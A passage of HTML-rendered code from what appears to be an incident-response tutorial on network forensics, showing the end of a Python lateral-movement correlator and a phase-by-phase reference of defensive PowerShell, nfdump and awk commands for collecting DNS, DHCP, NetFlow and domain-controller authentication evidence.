style=\"color:hsl(139, 66%, 32%)\">f\"  MOVEMENT: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'src_hostname'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> (</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'src_ip'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">)\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"       --&gt; </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'dst_hostname'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> (</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'dst_ip'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">) via </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">port_str</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"  IDENTITY: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'auth_account'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> [</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'auth_type'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">, Type </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">]\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"  VOLUME:   </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">mb</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> MB transferred\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"  FLAGS:    </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">flags_str</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Usage during incident response:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> __name__ </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'__main__'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    correlator </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> NetworkForensicsCorrelator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">load_dhcp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dhcp_export.csv'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">load_netflow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'netflow_internal.csv'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">load_auth_logs</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dc_auth_events.csv'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">correlate</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">time_window_seconds</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">60</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">print_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> high_only</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">True</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Export full timeline for SIEM ingestion or report</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'lateral_movement_timeline.json'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'w'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">dump</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> indent</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> default</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">str</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"\\n[*] Full timeline exported to lateral_movement_timeline.json\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] Total events: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">timeline</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] HIGH severity: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">sum</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation number\" style=\"color:hsl(212, 92%, 35%)\">1</span><span class=\"token string-interpolation interpolation\"> </span><span class=\"token string-interpolation interpolation keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token string-interpolation interpolation\"> e </span><span class=\"token string-interpolation interpolation keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token string-interpolation interpolation\"> timeline </span><span class=\"token string-interpolation interpolation keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token string-interpolation interpolation\"> e</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation\"> </span><span class=\"token string-interpolation interpolation operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token string-interpolation interpolation\"> </span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'HIGH'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-7--the-investigation-workflow-a-decision-tree-for-ir-teams\">Part 7  The Investigation Workflow: A Decision Tree for IR Teams<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-7--the-investigation-workflow-a-decision-tree-for-ir-teams\" class=\"hash-link\" aria-label=\"Direct link to Part 7  The Investigation Workflow: A Decision Tree for IR Teams\" title=\"Direct link to Part 7  The Investigation Workflow: A Decision Tree for IR Teams\" translate=\"no\">​</a></h2>\n<!-- -->\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"71-quick-reference-ir-commands-by-phase\">7.1 Quick Reference: IR Commands by Phase<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#71-quick-reference-ir-commands-by-phase\" class=\"hash-link\" aria-label=\"Direct link to 7.1 Quick Reference: IR Commands by Phase\" title=\"Direct link to 7.1 Quick Reference: IR Commands by Phase\" translate=\"no\">​</a></h3>\n<p><strong>Phase 1  Evidence Collection (first 30 minutes)</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On suspected source host  collect before reboot or shutdown</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ipconfig /displaydns &gt; dns_cache_$(hostname).txt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-DnsClientCache | Export-Csv dns_cache_structured_$(hostname).csv -NoTypeInformation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On DHCP server  export current leases and logs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Copy-Item \"C:\\Windows\\System32\\dhcp\\DhcpSrvLog-*.log\" \"C:\\IR\\dhcp_logs\\\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-DhcpServerv4Lease -ScopeId 10.10.0.0 -AllLeases |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object IPAddress, ClientId, HostName, AddressState, LeaseExpiryTime |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Export-Csv \"C:\\IR\\dhcp_active_leases.csv\" -NoTypeInformation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On Domain Controllers  export auth events for investigation window</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$filter = @{LogName='Security'; Id=@(4624,4625,4648,4769,4776,4768,4771,4672);</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            StartTime=(Get-Date).AddDays(-7); EndTime=(Get-Date)}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-WinEvent -FilterHashtable $filter |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object { $_.ToXml() } |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Out-File \"C:\\IR\\dc_auth_events_raw.xml\"</span><br></span></code></pre></div></div>\n<p><strong>Phase 2  NetFlow Queries (first 2 hours)</strong></p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># On NetFlow collector  identify all east-west connections from suspected host</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Replace 10.10.5.42 with your compromised host IP</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token assign-left variable\" style=\"color:hsl(26, 100%, 29%)\">SUSPECT</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"10.10.5.42\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token assign-left variable\" style=\"color:hsl(26, 100%, 29%)\">START</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"2025-11-14 00:00:00\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token assign-left variable\" style=\"color:hsl(26, 100%, 29%)\">END</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"2025-11-15 23:59:59\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/ </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-t</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">${START}</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">-</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">${END}</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts,%te,%sa,%da,%dp,%pr,%byt,%pkt,%flg\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"src ip </span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">${SUSPECT}</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\"> and dst net 10.0.0.0/8\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token plain\"> suspected_host_flows.csv</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Find all unique internal destinations</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> -F</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">','</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'NR&gt;1 {print $4}'</span><span class=\"token plain\"> suspected_host_flows.csv </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-u</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token plain\"> unique_destinations.txt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token builtin class-name\" style=\"color:hsl(26, 100%, 29%)\">echo</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Unique internal targets: </span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">$(</span><span class=\"token string variable function\" style=\"color:hsl(256, 54%, 50%)\">wc</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\"> </span><span class=\"token string variable parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-l</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\"> </span><span class=\"token string variable operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\"> unique_destinations.txt</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">)</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><br></span></code></pre></div></div>\n<p><strong>Phase 3  Correlation and Timeline (hours 2-4)</strong></p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Quick IP lookup against DHCP logs (command-line usage)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">python3 dhcp_correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">py \\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\">dhcp</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">dir</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\">path</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\">to</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\">dhcp</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span 